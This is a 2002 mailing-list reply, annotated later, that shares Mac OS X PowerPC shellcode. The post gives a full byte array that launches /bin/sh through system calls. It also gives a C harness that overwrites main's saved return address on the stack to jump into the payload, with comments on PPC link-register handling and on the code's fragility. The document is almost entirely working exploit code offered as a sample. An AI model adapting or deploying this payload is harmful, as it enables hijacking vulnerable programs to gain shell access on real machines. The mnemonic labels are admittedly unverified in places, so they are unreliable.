Re: OS X Shell Code

From: fintler (fintlerat_private)
Date: Thu Jan 10 2002 - 13:38:54 PST


    Here's a sample of PPC shellcode (it should work fine on Mac OS X). On PPC you
    have to worry about the link register holding the return address, along with
    the copy on the stack, so it's not like you can just overwrite it as on
    x86. That makes it harder to exploit those off-by-ones, I guess... this was
    written by someone named "Chris Shepard", I think:
    
    /*
     * Raw PowerPC machine code kept as a C string literal.
     *
     * Each 4-byte escape sequence below is one 32-bit instruction.  The
     * comment on every line gives the mnemonic as the original poster
     * labelled it and the instruction's byte offset from the start of the
     * array (the offsets have been corrected here to 4 * instruction index;
     * the original post skipped from 008 to 016).  The array ends with the
     * text "/bin/sh" plus an explicit NUL, and the string literal itself
     * appends a second, implicit NUL terminator, so sizeof shellcode is one
     * larger than the byte count listed.
     *
     * NOTE(review): the mnemonics are reproduced from the post and have not
     * been re-verified against the bytes; the one at offset 124 was labelled
     * "addfic", a typo for "addic" (its bytes are identical to offset 104).
     * From a defensive standpoint the cleartext "/bin/sh" tail is the most
     * readily recognisable artifact of this payload.
     */
    char shellcode[] =
      "\x7c\x08\x02\xa6"                   /*  mflr    r0              000 */
      "\x7c\x01\x03\x78"                   /*  mr      r1,r0           004 */
      "\x39\x20\x44\x01"                   /*  li      r9,17409        008 */
      "\x31\x29\xff\xff"                   /*  addic   r9,r9,-1        012 */
      "\x39\x40\x01\x04"                   /*  li      r10,260         016 */
      "\x31\x4a\xfe\xfe"                   /*  addic   r10,r10,-258    020 */
      "\x30\x41\x01\x74"                   /*  addic   r2,r1,372       024 */
      "\xb1\x22\xfe\xfc"                   /*  sth     r9,-260(r2)     028 */
      "\xb1\x42\xfe\xfe"                   /*  sth     r10,-258(r2)    032 */
      "\x30\x41\x01\x88"                   /*  addic   r1,r1,392       036 */
      "\xb1\x22\xfe\xfc"                   /*  sth     r9,-260(r2)     040 */
      "\xb1\x42\xfe\xfe"                   /*  sth     r10,-258(r2)    044 */
      "\x30\x21\x01\x89"                   /*  addic   r1,r1,393       048 */
      "\x30\x21\xfe\xff"                   /*  addic   r1,r1,-257      052 */
      "\x7c\x20\x0b\x78"                   /*  mr      r0,r1           056 */
      "\x31\x01\x01\x01"                   /*  addic   r8,r1,257       060 */
      "\x90\x08\xff\x07"                   /*  stw     r0,-249(r8)     064 */
      "\x7c\x03\x03\x78"                   /*  mr      r3,r0           068 */
      "\x30\x81\x01\x09"                   /*  addic   r4,r1,265       072 */
      "\x30\x84\xfe\xff"                   /*  addic   r4,r4,-257      076 */
      "\x7c\xa5\x2a\x78"                   /*  xor     r5,r5,r5        080 */
      "\x7c\xc6\x32\x78"                   /*  xor     r6,r6,r6        084 */
      "\x31\x01\x01\x01"                   /*  addic   r8,r1,257       088 */
      "\x90\xa8\xff\x0b"                   /*  stw     r5,-245(r8)     092 */
      "\x7c\xe7\x3a\x78"                   /*  xor     r7,r7,r7        096 */
      "\x30\xe7\x01\x3c"                   /*  addic   r7,r7,268       100 */
      "\x30\xe7\xfe\xff"                   /*  addic   r7,r7,-257      104 */
      "\x7c\xe0\x3b\x78"                   /*  mr      r0,r7           108 */
      "\x44\xff\xff\xff"                   /*  sc                      112 */
      "\x7c\xe7\x3a\x78"                   /*  xor     r7,r7,r7        116 */
      "\x30\xe7\x01\x02"                   /*  addic   r7,r7,258       120 */
      "\x30\xe7\xfe\xff"                   /*  addic   r7,r7,-257      124 */
      "\x7c\xe0\x3b\x78"                   /*  mr      r0,r7           128 */
      "\x44\xff\xff\xff"                   /*  sc                      132 */
      "\x2f\x62\x69\x6e\x2f\x73\x68\x00";  /*  /bin/sh \x00            136 */
    
    /*
     * Test harness for the shellcode array above.
     *
     * It produces no computable result.  It writes the address of
     * `shellcode` into the word 8 ints above the local `ret`, on the
     * assumption that this slot holds main's saved return address.  That
     * assumption is compiler- and platform-specific, and the pointer
     * arithmetic past the end of `ret` is undefined behaviour by the C
     * standard, so the harness is fragile by design: if the guess is right
     * main "returns" into the shellcode, otherwise it likely crashes or
     * returns normally.  On PPC the link register also carries the return
     * address (see the post above), so this alone may not be enough there.
     *
     * Portability notes, left as in the original post:
     *  - `void main()` is non-standard; hosted C requires `int main(void)`.
     *  - printf is called without a visible #include <stdio.h>; C99 and
     *    later reject the implicit declaration.
     *  - `(int)shellcode` truncates the pointer wherever pointers are wider
     *    than int -- presumably fine on the 32-bit PPC this targeted.
     */
    void main() {
      int *ret;                 /* local whose address anchors the stack write */

      /* Deliberately out of bounds: 8 ints above &ret is assumed to be the
       * saved-return-address slot (UB per the standard, see above). */
      ret = (int *)&ret + 8;
      (*ret) = (int)shellcode;  /* redirect the return into the shellcode */

      printf("Hi there.\n");    /* never seen if the redirect works at return */
    }
    


